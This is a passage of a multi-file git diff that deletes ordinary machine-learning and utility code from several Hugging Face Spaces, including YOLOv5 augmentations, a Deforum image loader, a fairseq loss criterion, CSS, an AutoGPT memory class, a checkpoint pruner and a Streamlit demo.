new_shape[1] - new_unpad[0], new_shape[0] - new_unpad[1] # wh padding - if auto: # minimum rectangle - dw, dh = np.mod(dw, stride), np.mod(dh, stride) # wh padding - elif scaleFill: # stretch - dw, dh = 0.0, 0.0 - new_unpad = (new_shape[1], new_shape[0]) - ratio = new_shape[1] / shape[1], new_shape[0] / shape[0] # width, height ratios - - dw /= 2 # divide padding into 2 sides - dh /= 2 - - if shape[::-1] != new_unpad: # resize - im = cv2.resize(im, new_unpad, interpolation=cv2.INTER_LINEAR) - top, bottom = int(round(dh - 0.1)), int(round(dh + 0.1)) - left, right = int(round(dw - 0.1)), int(round(dw + 0.1)) - im = cv2.copyMakeBorder(im, top, bottom, left, right, cv2.BORDER_CONSTANT, value=color) # add border - return im, ratio, (dw, dh) - - -def random_perspective(im, - targets=(), - segments=(), - degrees=10, - translate=.1, - scale=.1, - shear=10, - perspective=0.0, - border=(0, 0)): - # torchvision.transforms.RandomAffine(degrees=(-10, 10), translate=(0.1, 0.1), scale=(0.9, 1.1), shear=(-10, 10)) - # targets = [cls, xyxy] - - height = 
im.shape[0] + border[0] * 2 # shape(h,w,c) - width = im.shape[1] + border[1] * 2 - - # Center - C = np.eye(3) - C[0, 2] = -im.shape[1] / 2 # x translation (pixels) - C[1, 2] = -im.shape[0] / 2 # y translation (pixels) - - # Perspective - P = np.eye(3) - P[2, 0] = random.uniform(-perspective, perspective) # x perspective (about y) - P[2, 1] = random.uniform(-perspective, perspective) # y perspective (about x) - - # Rotation and Scale - R = np.eye(3) - a = random.uniform(-degrees, degrees) - # a += random.choice([-180, -90, 0, 90]) # add 90deg rotations to small rotations - s = random.uniform(1 - scale, 1 + scale) - # s = 2 ** random.uniform(-scale, scale) - R[:2] = cv2.getRotationMatrix2D(angle=a, center=(0, 0), scale=s) - - # Shear - S = np.eye(3) - S[0, 1] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # x shear (deg) - S[1, 0] = math.tan(random.uniform(-shear, shear) * math.pi / 180) # y shear (deg) - - # Translation - T = np.eye(3) - T[0, 2] = random.uniform(0.5 - translate, 0.5 + translate) * width # x translation (pixels) - T[1, 2] = random.uniform(0.5 - translate, 0.5 + translate) * height # y translation (pixels) - - # Combined rotation matrix - M = T @ S @ R @ P @ C # order of operations (right to left) is IMPORTANT - if (border[0] != 0) or (border[1] != 0) or (M != np.eye(3)).any(): # image changed - if perspective: - im = cv2.warpPerspective(im, M, dsize=(width, height), borderValue=(114, 114, 114)) - else: # affine - im = cv2.warpAffine(im, M[:2], dsize=(width, height), borderValue=(114, 114, 114)) - - # Visualize - # import matplotlib.pyplot as plt - # ax = plt.subplots(1, 2, figsize=(12, 6))[1].ravel() - # ax[0].imshow(im[:, :, ::-1]) # base - # ax[1].imshow(im2[:, :, ::-1]) # warped - - # Transform label coordinates - n = len(targets) - if n: - use_segments = any(x.any() for x in segments) - new = np.zeros((n, 4)) - if use_segments: # warp segments - segments = resample_segments(segments) # upsample - for i, segment in enumerate(segments): - xy = np.ones((len(segment), 3)) - xy[:, :2] = segment - xy = xy @ M.T # transform - xy = xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2] # perspective rescale or affine - - # clip - new[i] = segment2box(xy, width, height) - - else: # warp boxes - xy = np.ones((n * 4, 3)) - xy[:, :2] = targets[:, [1, 2, 3, 4, 1, 4, 3, 2]].reshape(n * 4, 2) # x1y1, x2y2, x1y2, x2y1 - xy = xy @ M.T # transform - xy = (xy[:, :2] / xy[:, 2:3] if perspective else xy[:, :2]).reshape(n, 8) # perspective rescale or affine - - # create new boxes - x = xy[:, [0, 2, 4, 6]] - y = xy[:, [1, 3, 5, 7]] - new = np.concatenate((x.min(1), y.min(1), x.max(1), y.max(1))).reshape(4, n).T - - # clip - new[:, [0, 2]] = new[:, [0, 2]].clip(0, width) - new[:, [1, 3]] = new[:, [1, 3]].clip(0, height) - - # filter candidates - i = box_candidates(box1=targets[:, 1:5].T * s, box2=new.T, area_thr=0.01 if use_segments else 0.10) - targets = targets[i] - targets[:, 1:5] = new[i] - - return im, targets - - -def copy_paste(im, labels, segments, p=0.5): - # Implement Copy-Paste augmentation https://arxiv.org/abs/2012.07177, labels as nx5 np.array(cls, xyxy) - n = len(segments) - if p and n: - h, w, c = im.shape # height, width, channels - im_new = np.zeros(im.shape, np.uint8) - for j in random.sample(range(n), k=round(p * n)): - l, s = labels[j], segments[j] - box = w - l[3], l[2], w - l[1], l[4] - ioa = bbox_ioa(box, labels[:, 1:5]) # intersection over area - if (ioa < 0.30).all(): # allow 30% obscuration of existing labels - labels = np.concatenate((labels, [[l[0], 
*box]]), 0) - segments.append(np.concatenate((w - s[:, 0:1], s[:, 1:2]), 1)) - cv2.drawContours(im_new, [segments[j].astype(np.int32)], -1, (1, 1, 1), cv2.FILLED) - - result = cv2.flip(im, 1) # augment segments (flip left-right) - i = cv2.flip(im_new, 1).astype(bool) - im[i] = result[i] # cv2.imwrite('debug.jpg', im) # debug - - return im, labels, segments - - -def cutout(im, labels, p=0.5): - # Applies image cutout augmentation https://arxiv.org/abs/1708.04552 - if random.random() < p: - h, w = im.shape[:2] - scales = [0.5] * 1 + [0.25] * 2 + [0.125] * 4 + [0.0625] * 8 + [0.03125] * 16 # image size fraction - for s in scales: - mask_h = random.randint(1, int(h * s)) # create random masks - mask_w = random.randint(1, int(w * s)) - - # box - xmin = max(0, random.randint(0, w) - mask_w // 2) - ymin = max(0, random.randint(0, h) - mask_h // 2) - xmax = min(w, xmin + mask_w) - ymax = min(h, ymin + mask_h) - - # apply random color mask - im[ymin:ymax, xmin:xmax] = [random.randint(64, 191) for _ in range(3)] - - # return unobscured labels - if len(labels) and s > 0.03: - box = np.array([xmin, ymin, xmax, ymax], dtype=np.float32) - ioa = bbox_ioa(box, xywhn2xyxy(labels[:, 1:5], w, h)) # intersection over area - labels = labels[ioa < 0.60] # remove >60% obscured labels - - return labels - - -def mixup(im, labels, im2, labels2): - # Applies MixUp augmentation https://arxiv.org/pdf/1710.09412.pdf - r = np.random.beta(32.0, 32.0) # mixup ratio, alpha=beta=32.0 - im = (im * r + im2 * (1 - r)).astype(np.uint8) - labels = np.concatenate((labels, labels2), 0) - return im, labels - - -def box_candidates(box1, box2, wh_thr=2, ar_thr=100, area_thr=0.1, eps=1e-16): # box1(4,n), box2(4,n) - # Compute candidate boxes: box1 before augment, box2 after augment, wh_thr (pixels), aspect_ratio_thr, area_ratio - w1, h1 = box1[2] - box1[0], box1[3] - box1[1] - w2, h2 = box2[2] - box2[0], box2[3] - box2[1] - ar = np.maximum(w2 / (h2 + eps), h2 / (w2 + eps)) # aspect ratio - return (w2 > wh_thr) & (h2 > wh_thr) & (w2 * h2 / (w1 * h1 + eps) > area_thr) & (ar < ar_thr) # candidates - - -def classify_albumentations( - augment=True, - size=224, - scale=(0.08, 1.0), - ratio=(0.75, 1.0 / 0.75), # 0.75, 1.33 - hflip=0.5, - vflip=0.0, - jitter=0.4, - mean=IMAGENET_MEAN, - std=IMAGENET_STD, - auto_aug=False): - # YOLOv5 classification Albumentations (optional, only used if package is installed) - prefix = colorstr('albumentations: ') - try: - import albumentations as A - from albumentations.pytorch import ToTensorV2 - check_version(A.__version__, '1.0.3', hard=True) # version requirement - if augment: # Resize and crop - T = [A.RandomResizedCrop(height=size, width=size, scale=scale, ratio=ratio)] - if auto_aug: - # TODO: implement AugMix, AutoAug & RandAug in albumentation - LOGGER.info(f'{prefix}auto augmentations are currently not supported') - else: - if hflip > 0: - T += [A.HorizontalFlip(p=hflip)] - if vflip > 0: - T += [A.VerticalFlip(p=vflip)] - if jitter > 0: - color_jitter = (float(jitter),) * 3 # repeat value for brightness, contrast, satuaration, 0 hue - T += [A.ColorJitter(*color_jitter, 0)] - else: # Use fixed crop for eval set (reproducibility) - T = [A.SmallestMaxSize(max_size=size), A.CenterCrop(height=size, width=size)] - T += [A.Normalize(mean=mean, std=std), ToTensorV2()] # Normalize and convert to Tensor - LOGGER.info(prefix + ', '.join(f'{x}'.replace('always_apply=False, ', '') for x in T if x.p)) - return A.Compose(T) - - except ImportError: # package not installed, skip - LOGGER.warning(f'{prefix}⚠️ not 
found, install with `pip install albumentations` (recommended)') - except Exception as e: - LOGGER.info(f'{prefix}{e}') - - -def classify_transforms(size=224): - # Transforms to apply if albumentations not installed - assert isinstance(size, int), f'ERROR: classify_transforms size {size} must be integer, not (list, tuple)' - # T.Compose([T.ToTensor(), T.Resize(size), T.CenterCrop(size), T.Normalize(IMAGENET_MEAN, IMAGENET_STD)]) - return T.Compose([CenterCrop(size), ToTensor(), T.Normalize(IMAGENET_MEAN, IMAGENET_STD)]) - - -class LetterBox: - # YOLOv5 LetterBox class for image preprocessing, i.e. T.Compose([LetterBox(size), ToTensor()]) - def __init__(self, size=(640, 640), auto=False, stride=32): - super().__init__() - self.h, self.w = (size, size) if isinstance(size, int) else size - self.auto = auto # pass max size integer, automatically solve for short side using stride - self.stride = stride # used with auto - - def __call__(self, im): # im = np.array HWC - imh, imw = im.shape[:2] - r = min(self.h / imh, self.w / imw) # ratio of new/old - h, w = round(imh * r), round(imw * r) # resized image - hs, ws = (math.ceil(x / self.stride) * self.stride for x in (h, w)) if self.auto else self.h, self.w - top, left = round((hs - h) / 2 - 0.1), round((ws - w) / 2 - 0.1) - im_out = np.full((self.h, self.w, 3), 114, dtype=im.dtype) - im_out[top:top + h, left:left + w] = cv2.resize(im, (w, h), interpolation=cv2.INTER_LINEAR) - return im_out - - -class CenterCrop: - # YOLOv5 CenterCrop class for image preprocessing, i.e. T.Compose([CenterCrop(size), ToTensor()]) - def __init__(self, size=640): - super().__init__() - self.h, self.w = (size, size) if isinstance(size, int) else size - - def __call__(self, im): # im = np.array HWC - imh, imw = im.shape[:2] - m = min(imh, imw) # min dimension - top, left = (imh - m) // 2, (imw - m) // 2 - return cv2.resize(im[top:top + m, left:left + m], (self.w, self.h), interpolation=cv2.INTER_LINEAR) - - -class ToTensor: - # YOLOv5 ToTensor class for image preprocessing, i.e. 
T.Compose([LetterBox(size), ToTensor()]) - def __init__(self, half=False): - super().__init__() - self.half = half - - def __call__(self, im): # im = np.array HWC in BGR order - im = np.ascontiguousarray(im.transpose((2, 0, 1))[::-1]) # HWC to CHW -> BGR to RGB -> contiguous - im = torch.from_numpy(im) # to torch - im = im.half() if self.half else im.float() # uint8 to fp16/32 - im /= 255.0 # 0-255 to 0.0-1.0 - return im diff --git a/spaces/aodianyun/stable-diffusion-webui/extensions/deforum/scripts/deforum_helpers/load_images.py b/spaces/aodianyun/stable-diffusion-webui/extensions/deforum/scripts/deforum_helpers/load_images.py deleted file mode 100644 index 6dc5726f8aed86fb190ae15aa6098c3bcac8ec2c..0000000000000000000000000000000000000000 --- a/spaces/aodianyun/stable-diffusion-webui/extensions/deforum/scripts/deforum_helpers/load_images.py +++ /dev/null @@ -1,102 +0,0 @@ -import requests -import os -from PIL import Image, ImageOps -import cv2 -import numpy as np -import socket -import torchvision.transforms.functional as TF - -def load_img(path : str, shape=None, use_alpha_as_mask=False): - # use_alpha_as_mask: Read the alpha channel of the image as the mask image - image = load_image(path) - if use_alpha_as_mask: - image = image.convert('RGBA') - else: - image = image.convert('RGB') - - if shape is not None: - image = image.resize(shape, resample=Image.LANCZOS) - - mask_image = None - if use_alpha_as_mask: - # Split alpha channel into a mask_image - red, green, blue, alpha = Image.Image.split(image) - mask_image = alpha.convert('L') - image = image.convert('RGB') - - # check using init image alpha as mask if mask is not blank - extrema = mask_image.getextrema() - if (extrema == (0,0)) or extrema == (255,255): - print("use_alpha_as_mask==True: Using the alpha channel from the init image as a mask, but the alpha channel is blank.") - print("ignoring alpha as mask.") - mask_image = None - - return image, mask_image - -def load_image(image_path :str): - image = None - if image_path.startswith('http://') or image_path.startswith('https://'): - try: - host = socket.gethostbyname("www.google.com") - s = socket.create_connection((host, 80), 2) - s.close() - except: - raise ConnectionError("There is no active internet connection available - please use local masks and init files only.") - - try: - response = requests.get(image_path, stream=True) - except requests.exceptions.RequestException as e: - raise ConnectionError("Failed to download image due to no internet connection. 
Error: {}".format(e)) - if response.status_code == 404 or response.status_code != 200: - raise ConnectionError("Init image url or mask image url is not valid") - image = Image.open(response.raw).convert('RGB') - else: - if not os.path.exists(image_path): - raise RuntimeError("Init image path or mask image path is not valid") - image = Image.open(image_path).convert('RGB') - - return image - -def prepare_mask(mask_input, mask_shape, mask_brightness_adjust=1.0, mask_contrast_adjust=1.0): - """ - prepares mask for use in webui - """ - if isinstance(mask_input, Image.Image): - mask = mask_input - else : - mask = load_image(mask_input) - mask = mask.resize(mask_shape, resample=Image.LANCZOS) - if mask_brightness_adjust != 1: - mask = TF.adjust_brightness(mask, mask_brightness_adjust) - if mask_contrast_adjust != 1: - mask = TF.adjust_contrast(mask, mask_contrast_adjust) - mask = mask.convert('L') - return mask - -def check_mask_for_errors(mask_input, invert_mask=False): - extrema = mask_input.getextrema() - if (invert_mask): - if extrema == (255,255): - print("after inverting mask will be blank. ignoring mask") - return None - elif extrema == (0,0): - print("mask is blank. ignoring mask") - return None - else: - return mask_input - -def get_mask(args): - return check_mask_for_errors( - prepare_mask(args.mask_file, (args.W, args.H), args.mask_contrast_adjust, args.mask_brightness_adjust) - ) - -def get_mask_from_file(mask_file, args): - return check_mask_for_errors( - prepare_mask(mask_file, (args.W, args.H), args.mask_contrast_adjust, args.mask_brightness_adjust) - ) - -def blank_if_none(mask, w, h, mode): - return Image.new(mode, (w, h), (0)) if mask is None else mask - -def none_if_blank(mask): - return None if mask.getextrema() == (0,0) else mask diff --git a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/adodbapi/examples/xls_write.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/adodbapi/examples/xls_write.py deleted file mode 100644 index cedb1488ad8aaf2852602d8e03367ac6871b0901..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/adodbapi/examples/xls_write.py +++ /dev/null @@ -1,40 +0,0 @@ -import adodbapi -import datetime - -try: - import adodbapi.is64bit as is64bit - - is64 = is64bit.Python() -except ImportError: - is64 = False # in case the user has an old version of adodbapi -if is64: - driver = "Microsoft.ACE.OLEDB.12.0" -else: - driver = "Microsoft.Jet.OLEDB.4.0" -filename = "xx.xls" # file will be created if it does not exist -extended = 'Extended Properties="Excel 8.0;Readonly=False;"' - -constr = "Provider=%s;Data Source=%s;%s" % (driver, filename, extended) - -conn = adodbapi.connect(constr) -with conn: # will auto commit if no errors - with conn.cursor() as crsr: - try: - crsr.execute("drop table SheetOne") - except: - pass # just is case there is one already there - - # create the sheet and the header row and set the types for the columns - crsr.execute( - "create table SheetOne (Name varchar, Rank varchar, SrvcNum integer, Weight float, Birth date)" - ) - - sql = "INSERT INTO SheetOne (name, rank , srvcnum, weight, birth) values (?,?,?,?,?)" - - data = ("Mike Murphy", "SSG", 123456789, 167.8, datetime.date(1922, 12, 27)) - crsr.execute(sql, data) # write the first row of data - crsr.execute( - sql, ["John Jones", "Pvt", 987654321, 140.0, datetime.date(1921, 7, 4)] - ) # another row of data -conn.close() -print("Created spreadsheet=%s worksheet=%s" % (filename, "SheetOne")) diff --git 
a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/fairseq/criterions/legacy_masked_lm.py b/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/fairseq/criterions/legacy_masked_lm.py deleted file mode 100644 index c70608c5a143b7b4fbd8c58dfcf9f873639d379c..0000000000000000000000000000000000000000 --- a/spaces/arxify/RVC-beta-v2-0618/runtime/Lib/site-packages/fairseq/criterions/legacy_masked_lm.py +++ /dev/null @@ -1,177 +0,0 @@ -# Copyright (c) Facebook, Inc. and its affiliates. -# -# This source code is licensed under the MIT license found in the -# LICENSE file in the root directory of this source tree. - -import math - -import torch -import torch.nn.functional as F -from fairseq import metrics, utils -from fairseq.criterions import FairseqCriterion, register_criterion - - -def compute_cross_entropy_loss(logits, targets, ignore_index=-100): - """ - Function to compute the cross entropy loss. The default value of - ignore_index is the same as the default value for F.cross_entropy in - pytorch. - """ - assert logits.size(0) == targets.size( - -1 - ), "Logits and Targets tensor shapes don't match up" - - loss = F.nll_loss( - F.log_softmax(logits, -1, dtype=torch.float32), - targets, - reduction="sum", - ignore_index=ignore_index, - ) - return loss - - -@register_criterion("legacy_masked_lm_loss") -class LegacyMaskedLmLoss(FairseqCriterion): - """ - Implementation for the loss used in masked language model (MLM) training. - This optionally also computes the next sentence prediction (NSP) loss and - adds it to the overall loss based on the specified args. There are three - cases to consider: - 1) Generic MLM training without NSP loss. In this case sentence_targets - and sentence_logits are both None. - 2) BERT training without NSP loss. In this case sentence_targets is - not None but sentence_logits is None and we should not be computing - a sentence level loss. - 3) BERT training with NSP loss. In this case both sentence_targets and - sentence_logits are not None and we should be computing a sentence - level loss. The weight of the sentence level loss is specified as - an argument. - """ - - def __init__(self, task, masked_lm_only, nsp_loss_weight): - super().__init__(task) - self.masked_lm_only = masked_lm_only - self.nsp_loss_weight = nsp_loss_weight - - @staticmethod - def add_args(parser): - """Args for MaskedLM Loss""" - # Default for masked_lm_only is False so as to not break BERT training - parser.add_argument( - "--masked-lm-only", - default=False, - action="store_true", - help="compute MLM loss only", - ) - parser.add_argument( - "--nsp-loss-weight", - default=1.0, - type=float, - help="weight for next sentence prediction" " loss (default 1)", - ) - - def forward(self, model, sample, reduce=True): - """Compute the loss for the given sample. - Returns a tuple with three elements: - 1) the loss - 2) the sample size, which is used as the denominator for the gradient - 3) logging outputs to display while training - """ - lm_logits, output_metadata = model(**sample["net_input"]) - - # reshape lm_logits from (N,T,C) to (N*T,C) - lm_logits = lm_logits.view(-1, lm_logits.size(-1)) - lm_targets = sample["lm_target"].view(-1) - lm_loss = compute_cross_entropy_loss(lm_logits, lm_targets, self.padding_idx) - - # compute the number of tokens for which loss is computed. 
This is used - # to normalize the loss - ntokens = utils.strip_pad(lm_targets, self.padding_idx).numel() - loss = lm_loss / ntokens - nsentences = sample["nsentences"] - # nsentences = 0 - - # Compute sentence loss if masked_lm_only is False - sentence_loss = None - if not self.masked_lm_only: - sentence_logits = output_metadata["sentence_logits"] - sentence_targets = sample["sentence_target"].view(-1) - # This needs to be recomputed due to some differences between - # TokenBlock and BlockPair dataset. This can be resolved with a - # refactor of BERTModel which we will do in the future. - # TODO: Remove this after refactor of BERTModel - nsentences = sentence_targets.size(0) - - # Check for logits being none which can happen when remove_heads - # is set to true in the BERT model. Ideally we should set - # masked_lm_only to true in this case, but that requires some - # refactor in the BERT model. - if sentence_logits is not None: - sentence_loss = compute_cross_entropy_loss( - sentence_logits, sentence_targets - ) - - loss += self.nsp_loss_weight * (sentence_loss / nsentences) - - # NOTE: as we are summing up per token mlm loss and per sentence nsp loss - # we don't need to use sample_size as denominator for the gradient - # here sample_size is just used for logging - sample_size = 1 - logging_output = { - "loss": utils.item(loss.data) if reduce else loss.data, - "lm_loss": utils.item(lm_loss.data) if reduce else lm_loss.data, - # sentence loss is not always computed - "sentence_loss": ( - (utils.item(sentence_loss.data) if reduce else sentence_loss.data) - if sentence_loss is not None - else 0.0 - ), - "ntokens": ntokens, - "nsentences": nsentences, - "sample_size": sample_size, - } - return loss, sample_size, logging_output - - @staticmethod - def reduce_metrics(logging_outputs) -> None: - """Aggregate logging outputs from data parallel training.""" - lm_loss_sum = sum(log.get("lm_loss", 0) for log in logging_outputs) - sentence_loss_sum = sum(log.get("sentence_loss", 0) for log in logging_outputs) - ntokens = sum(log.get("ntokens", 0) for log in logging_outputs) - nsentences = sum(log.get("nsentences", 0) for log in logging_outputs) - sample_size = sum(log.get("sample_size", 0) for log in logging_outputs) - agg_loss = sum(log.get("loss", 0) for log in logging_outputs) - - metrics.log_scalar( - "loss", - agg_loss / sample_size / math.log(2) if sample_size > 0 else 0.0, - sample_size, - round=3, - ) - metrics.log_scalar( - "lm_loss", - lm_loss_sum / ntokens / math.log(2) if ntokens > 0 else 0.0, - ntokens, - round=3, - ) - metrics.log_scalar( - "sentence_loss", - sentence_loss_sum / nsentences / math.log(2) if nsentences > 0 else 0.0, - nsentences, - round=3, - ) - metrics.log_scalar( - "nll_loss", - lm_loss_sum / ntokens / math.log(2) if ntokens > 0 else 0.0, - ntokens, - round=3, - ) - - @staticmethod - def logging_outputs_can_be_summed() -> bool: - """ - Whether the logging outputs returned by `forward` can be summed - across workers prior to calling `reduce_metrics`. Setting this - to True will improves distributed training speed. 
- """ - return True diff --git a/spaces/ashercn97/AsherTesting/css/chat.css b/spaces/ashercn97/AsherTesting/css/chat.css deleted file mode 100644 index 45a518bc56fcaae04ac73f6535c2349bf1f974fe..0000000000000000000000000000000000000000 --- a/spaces/ashercn97/AsherTesting/css/chat.css +++ /dev/null @@ -1,126 +0,0 @@ -.h-\[40vh\], .wrap.svelte-byatnx.svelte-byatnx.svelte-byatnx { - height: 66.67vh -} - -.gradio-container { - margin-left: auto !important; - margin-right: auto !important; -} - -.w-screen { - width: unset -} - -div.svelte-362y77>*, div.svelte-362y77>.form>* { - flex-wrap: nowrap -} - -/* fixes the API documentation in chat mode */ -.api-docs.svelte-1iguv9h.svelte-1iguv9h.svelte-1iguv9h { - display: grid; -} - -.pending.svelte-1ed2p3z { - opacity: 1; -} - -#extensions { - padding: 0; - padding: 0; -} - -#gradio-chatbot { - height: 66.67vh; -} - -.wrap.svelte-6roggh.svelte-6roggh { - max-height: 92.5%; -} - -/* This is for the microphone button in the whisper extension */ -.sm.svelte-1ipelgc { - width: 100%; -} - -#main button { - min-width: 0 !important; -} - -/*****************************************************/ -/*************** Chat box declarations ***************/ -/*****************************************************/ - -.chat { - margin-left: auto; - margin-right: auto; - max-width: 800px; - height: calc(100vh - 296px); - overflow-y: auto; - padding-right: 20px; - display: flex; - flex-direction: column-reverse; - word-break: break-word; - overflow-wrap: anywhere; - padding-top: 1px; -} - -.message-body li { - margin-top: 0.5em !important; - margin-bottom: 0.5em !important; -} - -.message-body li > p { - display: inline !important; -} - -.message-body ul, .message-body ol { - font-size: 15px !important; -} - -.message-body ul { - list-style-type: disc !important; -} - -.message-body pre { - margin-bottom: 1.25em !important; -} - -.message-body code { - white-space: pre-wrap !important; - word-wrap: break-word !important; -} - -.message-body :not(pre) > code { - white-space: normal !important; -} - -@media print { - body { - visibility: hidden; - } - - .chat { - visibility: visible; - position: absolute; - left: 0; - top: 0; - max-width: none; - max-height: none; - width: 100%; - height: fit-content; - display: flex; - flex-direction: column-reverse; - } - - .message { - break-inside: avoid; - } - - .gradio-container { - overflow: visible; - } - - .tab-nav { - display: none !important; - } -} diff --git a/spaces/avivdm1/AutoGPT/autogpt/memory/base.py b/spaces/avivdm1/AutoGPT/autogpt/memory/base.py deleted file mode 100644 index 691e2299c4caa5c2e9af5b2436727834f3cc6c67..0000000000000000000000000000000000000000 --- a/spaces/avivdm1/AutoGPT/autogpt/memory/base.py +++ /dev/null @@ -1,43 +0,0 @@ -"""Base class for memory providers.""" -import abc - -import openai - -from autogpt.config import AbstractSingleton, Config - -cfg = Config() - - -def get_ada_embedding(text): - text = text.replace("\n", " ") - if cfg.use_azure: - return openai.Embedding.create( - input=[text], - engine=cfg.get_azure_deployment_id_for_model("text-embedding-ada-002"), - )["data"][0]["embedding"] - else: - return openai.Embedding.create(input=[text], model="text-embedding-ada-002")[ - "data" - ][0]["embedding"] - - -class MemoryProviderSingleton(AbstractSingleton): - @abc.abstractmethod - def add(self, data): - pass - - @abc.abstractmethod - def get(self, data): - pass - - @abc.abstractmethod - def clear(self): - pass - - @abc.abstractmethod - def get_relevant(self, data, num_relevant=5): - pass - - 
@abc.abstractmethod - def get_stats(self): - pass diff --git a/spaces/awaawawawa/iurf7irfuyytruyyugb/prune.py b/spaces/awaawawawa/iurf7irfuyytruyyugb/prune.py deleted file mode 100644 index ef1d2364b5e15611cc13da0d3d5cdda3eae19f45..0000000000000000000000000000000000000000 --- a/spaces/awaawawawa/iurf7irfuyytruyyugb/prune.py +++ /dev/null @@ -1,56 +0,0 @@ -import os -from pathlib import Path -import torch -import argparse -parser = argparse.ArgumentParser() -args = parser.parse_args() - - -def prune_it(p, keep_only_ema=True): - print(f"prunin' in path: {p}") - size_initial = os.path.getsize(p) - nsd = dict() - sd = torch.load(p, map_location="cpu") - print(sd.keys()) - for k in sd.keys(): - if k != "optimizer_states": - nsd[k] = sd[k] - else: - print(f"removing optimizer states for path {p}") - if "global_step" in sd: - print(f"This is global step {sd['global_step']}.") - if keep_only_ema: - sd = nsd["state_dict"].copy() - # infer ema keys - ema_keys = {k: "model_ema." + k[6:].replace(".", "") for k in sd.keys() if k.startswith('model.')} - new_sd = dict() - - for k in sd: - if k in ema_keys: - print(k, ema_keys[k]) - new_sd[k] = sd[ema_keys[k]] - elif not k.startswith("model_ema.") or k in ["model_ema.num_updates", "model_ema.decay"]: - new_sd[k] = sd[k] - - assert len(new_sd) == len(sd) - len(ema_keys) - nsd["state_dict"] = new_sd - else: - sd = nsd['state_dict'].copy() - new_sd = dict() - for k in sd: - new_sd[k] = sd[k] - nsd['state_dict'] = new_sd - - fn = f"{os.path.splitext(p)[0]}-pruned.ckpt" if not keep_only_ema else f"{os.path.splitext(p)[0]}-ema-pruned.ckpt" - print(f"saving pruned checkpoint at: {fn}") - torch.save(nsd, fn) - newsize = os.path.getsize(fn) - MSG = f"New ckpt size: {newsize*1e-9:.2f} GB. " + \ - f"Saved {(size_initial - newsize)*1e-9:.2f} GB by removing optimizer states" - if keep_only_ema: - MSG += " and non-EMA weights" - print(MSG) - - -if __name__ == "__main__": - prune_it('wd-v1-2-full-ema.ckpt') diff --git a/spaces/awacke1/Spending-Simulation/backupapp.py b/spaces/awacke1/Spending-Simulation/backupapp.py deleted file mode 100644 index 27d1dfd3e618420815492f6034705ed5557e56aa..0000000000000000000000000000000000000000 --- a/spaces/awacke1/Spending-Simulation/backupapp.py +++ /dev/null @@ -1,71 +0,0 @@ -import streamlit as st -import csv -import base64 - -# Define the state populations and family sizes -state_data = { - 'California': {'population': 39538223, 'family_size': 3.3}, - 'Texas': {'population': 29145505, 'family_size': 3.4}, - 'Florida': {'population': 21538187, 'family_size': 3.0}, - 'New York': {'population': 19849399, 'family_size': 3.1}, - 'Minnesota': {'population': 5700671, 'family_size': 2.5}, - 'Wisconsin': {'population': 5897473, 'family_size': 2.6}, -} - -# Define the state spending data -spending_data = { - 'California': {'education': 2500, 'healthcare': 3000, 'transportation': 1500}, - 'Texas': {'education': 2000, 'healthcare': 2500, 'transportation': 1000}, - 'Florida': {'education': 1500, 'healthcare': 2000, 'transportation': 750}, - 'New York': {'education': 3000, 'healthcare': 3500, 'transportation': 2000}, - 'Minnesota': {'education': 1000, 'healthcare': 1500, 'transportation': 500}, - 'Wisconsin': {'education': 1250, 'healthcare': 1750, 'transportation': 750}, -} - -# Define the emoji icons -POPULATION_ICON = '👥' -FAMILY_SIZE_ICON = '👨‍👩‍👧‍👦' -EDUCATION_ICON = '🏫' -HEALTHCARE_ICON = '🏥' -TRANSPORTATION_ICON = '🚗' - -def main(): - st.title('State Comparison') - - # Consolidate the state data and spending data into a list of 
dictionaries - state_list = [] - for state, data in state_data.items(): - state_dict = { - 'state': state, - 'population': data['population'], - 'family_size': data['family_size'], - 'education_spending': spending_data[state]['education'], - 'healthcare_spending': spending_data[state]['healthcare'], - 'transportation_spending': spending_data[state]['transportation'] - } - state_list.append(state_dict) - - # Save the data to a CSV file and provide a download link - with open('state_data.csv', mode='w', newline='') as file: - writer = csv.DictWriter(file, fieldnames=['state', 'population', 'family_size', 'education_spending', 'healthcare_spending', 'transportation_spending']) - writer.writeheader() - for state in state_list: - writer.writerow(state) - with open('state_data.csv', mode='rb') as file: - b64 = base64.b64encode(file.read()).decode('utf-8') - st.markdown(f'Download State Data CSV File', unsafe_allow_html=True) - - # Display state populations and family sizes - st.header('Population and Family Size') - for state, data in state_data.items(): - st.subheader(f'{POPULATION_ICON} {state}') - st.write(f'Population: {data["population"]}') - st.write(f'Family Size: {data["family_size"]}') - -# Display state spending data -st.header('State Spending') -for state, data in spending_data.items(): - st.subheader(state) - st.write(f'{EDUCATION_ICON} Education: {data["education"]}') - st.write(f'{HEALTHCARE_ICON} Healthcare: {data["healthcare"]}') - st.write(f'{TRANSPORTATION_ICON} Transportation: {data["transportation"]}') \ No newline at end of file diff --git a/spaces/ayaanzaveri/whisper-webui/src/conversion/hf_converter.py b/spaces/ayaanzaveri/whisper-webui/src/conversion/hf_converter.py deleted file mode 100644 index a86b5c2f7eb1b1ef60340533c62acd8c109af7b8..0000000000000000000000000000000000000000 --- a/spaces/ayaanzaveri/whisper-webui/src/conversion/hf_converter.py +++ /dev/null @@ -1,67 +0,0 @@ -# https://github.com/bayartsogt-ya/whisper-multiple-hf-datasets - -from copy import deepcopy -import torch -from transformers import WhisperForConditionalGeneration - -WHISPER_MAPPING = { - "layers": "blocks", - "fc1": "mlp.0", - "fc2": "mlp.2", - "final_layer_norm": "mlp_ln", - "layers": "blocks", - ".self_attn.q_proj": ".attn.query", - ".self_attn.k_proj": ".attn.key", - ".self_attn.v_proj": ".attn.value", - ".self_attn_layer_norm": ".attn_ln", - ".self_attn.out_proj": ".attn.out", - ".encoder_attn.q_proj": ".cross_attn.query", - ".encoder_attn.k_proj": ".cross_attn.key", - ".encoder_attn.v_proj": ".cross_attn.value", - ".encoder_attn_layer_norm": ".cross_attn_ln", - ".encoder_attn.out_proj": ".cross_attn.out", - "decoder.layer_norm.": "decoder.ln.", - "encoder.layer_norm.": "encoder.ln_post.", - "embed_tokens": "token_embedding", - "encoder.embed_positions.weight": "encoder.positional_embedding", - "decoder.embed_positions.weight": "decoder.positional_embedding", - "layer_norm": "ln_post", -} - - -def rename_keys(s_dict): - keys = 